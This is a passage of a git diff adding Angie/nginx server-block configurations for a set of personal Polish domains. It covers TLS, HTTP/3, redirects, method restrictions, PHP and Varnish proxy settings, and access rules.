include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST|HEAD|PUT)$) { + return '405'; + } + + error_page 400 @echo_400; + + location @echo400 { + add_header Content-Type text/plain; + return 200 "Bad request :)"; + } + + + error_page 404 403 500 504 502 =200 /; + + # logging + access_log /var/log/angie/doh.linuxiarz.pl.access.log; + error_log /var/log/angie/doh.linuxiarz.pl.error.log warn; + + # additional config + include config/general.conf; + + location / { + proxy_pass https://127.0.0.1:8844/; + include config/proxy.conf; + } + + +} + +# HTTP redirect +server { + listen 80; + server_name doh.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://doh.linuxiarz.pl$request_uri; + } +} + diff --git a/sites-enabled/gitea.linuxiarz.pl.conf b/sites-enabled/gitea.linuxiarz.pl.conf new file mode 120000 index 0000000..cfed4d0 --- /dev/null +++ b/sites-enabled/gitea.linuxiarz.pl.conf @@ -0,0 +1 @@ +../sites-available/gitea.linuxiarz.pl.conf \ No newline at end of file diff --git a/sites-enabled/gruszczynski.cc.conf b/sites-enabled/gruszczynski.cc.conf new file mode 100644 index 0000000..5a760d7 --- /dev/null +++ b/sites-enabled/gruszczynski.cc.conf @@ -0,0 +1,101 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name www.gruszczynski.cc; + set $base /var/www/gruszczynski.cc; + root $base; + + ssl_certificate /etc/ssl/gruszczynski.cc/fullchain.pem; + ssl_certificate_key /etc/ssl/gruszczynski.cc/privkey.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + + if ($host = 'www.gruszczynski.cc') { + return 301 http://www.linuxiarz.pl$request_uri; + } + + + error_page 404 403 500 504 502 =200 /; + + # logging + access_log /var/log/angie/gruszczynski.cc.access.log; + error_log /var/log/angie/gruszczynski.cc.error.log warn; + + # index.html + index index.html; + + # additional config + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + + # handle .php +# location ~ \.php$ { +# include config/php_fastcgi.conf; +# } +} + +# HTTP redirect +server { + listen 80; + server_name gruszczynski.cc www.gruszczynski.cc; + add_header Alt-Svc 'h3=":443"; ma=86400'; + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.cc$request_uri; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + + server_name gruszczynski.cc; + + ssl_certificate /etc/ssl/gruszczynski.cc/fullchain.pem; + ssl_certificate_key /etc/ssl/gruszczynski.cc/privkey.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.cc$request_uri; + } +} diff --git a/sites-enabled/gruszczynski.eu.org_varnish.conf b/sites-enabled/gruszczynski.eu.org_varnish.conf new file mode 100644 index 0000000..36878a6 --- /dev/null +++ b/sites-enabled/gruszczynski.eu.org_varnish.conf @@ -0,0 +1,108 @@ +server { + listen 8080; + server_name www.gruszczynski.eu.org; + set $base /var/www/gruszczynski.eu.org; + root $base; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + #access_log /var/log/angie/gruszczynski.eu.org.access.log; + #error_log /var/log/angie/gruszczynski.eu.org.error.log warn; + + # index.php + index index.php index.html; + + # additional config + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name www.gruszczynski.eu.org; + + ssl_certificate /etc/ssl/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/ssl/gruszczynski.eu.org/privkey.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + + + + +# HTTP redirect +server { + listen 80; + add_header Alt-Svc 'h3=":443"; ma=86400'; + server_name gruszczynski.eu.org www.gruszczynski.eu.org; + +# include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name gruszczynski.eu.org; + + ssl_certificate /etc/ssl/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/ssl/gruszczynski.eu.org/privkey.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-enabled/img.gruszczynski.eu.org.conf b/sites-enabled/img.gruszczynski.eu.org.conf new file mode 100644 index 0000000..a5d6a49 --- /dev/null +++ b/sites-enabled/img.gruszczynski.eu.org.conf @@ -0,0 +1,63 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name img.gruszczynski.eu.org; + set $base /var/www/img.gruszczynski.eu.org; + root $base/img; + + ssl_certificate /etc/letsencrypt/live/img.gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/img.gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/img.gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/angie/img.gruszczynski.eu.org.access.log; + error_log /var/log/angie/img.gruszczynski.eu.org.error.log warn; + + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name img.gruszczynski.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + set $base /var/www/img.gruszczynski.eu.org; + root $base/img; + + include config/letsencrypt.conf; + + # logging + access_log /var/log/angie/img.gruszczynski.eu.org.access.log; + error_log /var/log/angie/img.gruszczynski.eu.org.error.log warn; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://img.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-enabled/kodi.linuxiarz.pl.conf b/sites-enabled/kodi.linuxiarz.pl.conf new file mode 100644 index 0000000..f049b3d --- /dev/null +++ b/sites-enabled/kodi.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name kodi.linuxiarz.pl; + set $base /var/www/kodi.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name kodi.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://kodi.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/kompilacje.linuxiarz.pl.conf b/sites-enabled/kompilacje.linuxiarz.pl.conf new file mode 100644 index 0000000..aed6a43 --- /dev/null +++ b/sites-enabled/kompilacje.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name kompilacje.linuxiarz.pl; + set $base /var/www/kompilacje.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name kompilacje.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://kompilacje.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/linuxiarz.pl_new.conf b/sites-enabled/linuxiarz.pl_new.conf new file mode 120000 index 0000000..42897c4 --- /dev/null +++ b/sites-enabled/linuxiarz.pl_new.conf @@ -0,0 +1 @@ +../sites-available/linuxiarz.pl_new.conf \ No newline at end of file diff --git a/sites-enabled/listapp.linuxiarz.pl.conf b/sites-enabled/listapp.linuxiarz.pl.conf new file mode 120000 index 0000000..ec811b5 --- /dev/null +++ b/sites-enabled/listapp.linuxiarz.pl.conf @@ -0,0 +1 @@ +/etc/angie/sites-available/listapp.linuxiarz.pl.conf \ No newline at end of file diff --git a/sites-enabled/nginx.linuxiarz.pl.conf b/sites-enabled/nginx.linuxiarz.pl.conf new file mode 100644 index 0000000..6afa5d2 --- /dev/null +++ b/sites-enabled/nginx.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name nginx.linuxiarz.pl; + set $base /var/www/nginx.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name nginx.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://nginx.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/pa.linuxiarz.pl.conf b/sites-enabled/pa.linuxiarz.pl.conf new file mode 100644 index 0000000..20e1825 --- /dev/null +++ b/sites-enabled/pa.linuxiarz.pl.conf @@ -0,0 +1,55 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pa.linuxiarz.pl; + set $base /var/www/postfixadmin; +# set $base /var/www/postfixadmin-postfixadmin-cc23eba; + root $base/public; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/angie/pa.linuxiarz.pl.access.log; + error_log /var/log/angie/pa.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ login.php; + } + + # additional config + include config/general.conf; + + # handle .php + location ~* \.php$ { + include config/php_fastcgi7_4.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name pa.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://pa.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/paste.linuxiarz.pl_varnish.conf b/sites-enabled/paste.linuxiarz.pl_varnish.conf new file mode 100644 index 0000000..09aca2b --- /dev/null +++ b/sites-enabled/paste.linuxiarz.pl_varnish.conf @@ -0,0 +1,72 @@ +server { + listen 8080; + server_name paste.linuxiarz.pl; + set $base /var/www/paste.linuxiarz.pl; + root $base; + + # security + include config/security_paste.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri /index.php; + } + + if ($request_uri !~* ^/(static|favicon\.ico|robots\.txt)) { + rewrite ^/(.*)$ /index.php?/$1 last; + break; + } + + # additional config +#g.lin include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi7_4.conf; + } +} + + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name paste.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/angie/paste.linuxiarz.pl.access.log; + error_log /var/log/angie/paste.linuxiarz.pl.error.log warn; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name paste.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://paste.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/pliki.linuxiarz.pl.conf b/sites-enabled/pliki.linuxiarz.pl.conf new file mode 100644 index 0000000..77253ef --- /dev/null +++ b/sites-enabled/pliki.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pliki.linuxiarz.pl; + set $base /var/www/linuxiarz.pl/pliki; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name pliki.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://pliki.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/pma.linuxiarz.pl.conf b/sites-enabled/pma.linuxiarz.pl.conf new file mode 100644 index 0000000..b0d3bd0 --- /dev/null +++ b/sites-enabled/pma.linuxiarz.pl.conf @@ -0,0 +1,55 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name pma.linuxiarz.pl; + set $base /var/www/pma.linuxiarz.pl/pma; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/angie/pma.linuxiarz.pl.access.log; + error_log /var/log/angie/pma.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + allow 109.173.163.175/32; + deny all; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name pma.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://pma.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/quarantine.linuxiarz.pl.conf b/sites-enabled/quarantine.linuxiarz.pl.conf new file mode 100644 index 0000000..399f300 --- /dev/null +++ b/sites-enabled/quarantine.linuxiarz.pl.conf @@ -0,0 +1,44 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name quarantine.linuxiarz.pl; + + include config/wildcard.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + + include uwsgi_params; + uwsgi_pass 127.0.0.1:9000; + + allow 85.221.253.162; + allow 127.0.0.1; + deny all; + } + +} + +# HTTP redirect +server { + listen 80; + server_name quarantine.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://quarantine.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/r.linuxiarz.pl.conf b/sites-enabled/r.linuxiarz.pl.conf new file mode 100644 index 0000000..e9d3766 --- /dev/null +++ b/sites-enabled/r.linuxiarz.pl.conf @@ -0,0 +1,66 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name r.linuxiarz.pl; + set $base /var/www/rainloop; + root $base; + + include config/wildcard.conf; + include config/security_roundcube.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/angie/r.linuxiarz.pl.access.log; + error_log /var/log/angie/r.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(data)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name r.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://r.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/redirects.conf b/sites-enabled/redirects.conf new file mode 100644 index 0000000..3ca83c8 --- /dev/null +++ b/sites-enabled/redirects.conf @@ -0,0 +1,32 @@ +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + ssl_certificate /etc/ssl/gru.one.pl/fullchain.pem; + ssl_certificate_key /etc/ssl/gru.one.pl/privkey.pem; + + server_name .gru.one.pl ; + + if ($scheme = http) { + return 301 https://$host$request_uri; + } + + location / { + return 301 https://www.linuxiarz.pl$request_uri; + } +} + +server { + listen 80; + server_name .grucha.eu.org; + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-enabled/repo.linuxiarz.pl.conf b/sites-enabled/repo.linuxiarz.pl.conf new file mode 100644 index 0000000..51609c3 --- /dev/null +++ b/sites-enabled/repo.linuxiarz.pl.conf @@ -0,0 +1,64 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name repo.linuxiarz.pl; + set $base /var/www/repo.linuxiarz.pl; + root $base; + + include config/wildcard.conf; + + index index.php; + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/angie/repo.linuxiarz.pl.access.log; + error_log /var/log/angie/repo.linuxiarz.pl.error.log warn; + + + location ~* \.(?:tar.gz|zip?)$ { + rewrite ^/(.*)$ https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frhsuwgawuyg/b/linuxiarz-repo/o/$1 permanent; + } + + + location / { +# try_files $uri $uri/ /index.php?dl=$uri; + try_files $uri $uri/ /index.php?$uri; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name repo.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://repo.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/rspamd.linuxiarz.pl.conf b/sites-enabled/rspamd.linuxiarz.pl.conf new file mode 100644 index 0000000..38a5789 --- /dev/null +++ b/sites-enabled/rspamd.linuxiarz.pl.conf @@ -0,0 +1,49 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name rspamd.linuxiarz.pl; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + proxy_pass http://127.0.0.1:11334/; + include config/proxy.conf; + } + + # additional config +# include config/general.conf; +} + +# HTTP redirect +server { + listen 80; + server_name rspamd.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://rspamd.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/sk.linuxiarz.pl.conf b/sites-enabled/sk.linuxiarz.pl.conf new file mode 100644 index 0000000..434fcae --- /dev/null +++ b/sites-enabled/sk.linuxiarz.pl.conf @@ -0,0 +1,49 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name sk.linuxiarz.pl; + set $base /var/www/sk.linuxiarz.pl; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/angie/sk.linuxiarz.pl.access.log; + error_log /var/log/angie/sk.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi8_1.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name sk.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://sk.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/status.conf b/sites-enabled/status.conf new file mode 120000 index 0000000..d39f44d --- /dev/null +++ b/sites-enabled/status.conf @@ -0,0 +1 @@ +../conf.d/status.conf \ No newline at end of file diff --git a/sites-enabled/ts3stats.linuxiarz.pl.conf b/sites-enabled/ts3stats.linuxiarz.pl.conf new file mode 100644 index 0000000..c222214 --- /dev/null +++ b/sites-enabled/ts3stats.linuxiarz.pl.conf @@ -0,0 +1,67 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name ts3stats.linuxiarz.pl; + set $base /var/www/ts3stats; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/angie/ts3stats.linuxiarz.pl.access.log; + error_log /var/log/angie/ts3stats.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + location / { + try_files $uri $uri/ /index.php; + } + + location /rrd { + rewrite ^ $scheme://$host permanent; + deny all; + } + + location ~ /graph { + allow all; + } + + location /libraries { + rewrite ^ $scheme://$host permanent; + deny all; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name ts3stats.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://ts3stats.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/unitraklub.pl.conf b/sites-enabled/unitraklub.pl.conf new file mode 100644 index 0000000..635c848 --- /dev/null +++ b/sites-enabled/unitraklub.pl.conf @@ -0,0 +1,38 @@ +server { + listen 80; + server_name *.unitraklub.pl unitraklub.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + root /var/www/503/; + index index.html; + + if ($scheme = http) { + return 301 https://$host$request_uri; + } + + +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name *.unitraklub.pl unitraklub.pl; + + ssl_certificate /etc/ssl/unitraklub.pl/fullchain.pem; + ssl_certificate_key /etc/ssl/unitraklub.pl/privkey.pem; + + ssl_stapling off; + + root /var/www/503/; + index index.html; + + location / { + try_files /index.html =404; + } +} diff --git a/sites-enabled/webmail-beta.linuxiarz.pl.conf b/sites-enabled/webmail-beta.linuxiarz.pl.conf new file mode 100644 index 0000000..97a41d6 --- /dev/null +++ b/sites-enabled/webmail-beta.linuxiarz.pl.conf @@ -0,0 +1,60 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name webmail-beta.linuxiarz.pl; + set $base /var/www/webmail-beta; + root $base; + + include config/wildcard.conf; + include config/security_wp.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } + + # logging + access_log /var/log/angie/webmail-beta.linuxiarz.pl.access.log; + error_log /var/log/angie/webmail-beta.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location /x { + try_files $uri $uri/ index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi_webmail.conf; + } +} + diff --git a/sites-enabled/webmail.linuxiarz.pl.conf b/sites-enabled/webmail.linuxiarz.pl.conf new file mode 100644 index 0000000..99e1f84 --- /dev/null +++ b/sites-enabled/webmail.linuxiarz.pl.conf @@ -0,0 +1,96 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name webmail.linuxiarz.pl; + set $base /var/www/webmail; + root $base; + + include config/wildcard.conf; + include config/security_roundcube.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST)$) { + return '405'; + } + + # logging + access_log /var/log/angie/webmail.linuxiarz.pl.access.log; + error_log /var/log/angie/webmail.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback +# location / { +# try_files $uri $uri/ index.php; +# } + + location / { + try_files $uri $uri/ /index.php; + } + + location ~ ^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$ { + deny all; + error_page 403 =404 / ; + } + + location ~ ^/(bin|SQL|config|temp|logs)/ { + deny all; + } + + location ~\.(ini|log|conf|MD|md|json)$ { + deny all; + error_page 403 =404 / ; + } + + # additional config + include config/general.conf; + + # handle .php with PATH_INFO support + location ~ \.php(?:$|/) { + include config/php_fastcgi_webmail.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name webmail.linuxiarz.pl poczta.linuxiarz.pl poczta.gru.one.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} + +# Other redirects +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name poczta.linuxiarz.pl; + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://webmail.linuxiarz.pl$request_uri; + } +} diff --git a/sites-enabled/z.gruszczynski.eu.org_varnish.conf b/sites-enabled/z.gruszczynski.eu.org_varnish.conf new file mode 100644 index 0000000..76bd1d8 --- /dev/null +++ b/sites-enabled/z.gruszczynski.eu.org_varnish.conf @@ -0,0 +1,87 @@ +server { + listen 8080; + server_name z.gruszczynski.eu.org; + set $base /var/www/z.gruszczynski.eu.org; + root $base; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # index.php + index index.php; + + # additional config + include config/general.conf; + port_in_redirect off; + + location / { + } + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name z.gruszczynski.eu.org; + + access_log /var/log/angie/z.gruszczynski.eu.org.access.log main; + error_log /var/log/angie/z.gruszczynski.eu.org.error.log warn; + + ssl_certificate /etc/letsencrypt/live/z.gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/z.gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/z.gruszczynski.eu.org/chain.pem; + + # ssl cfg + include 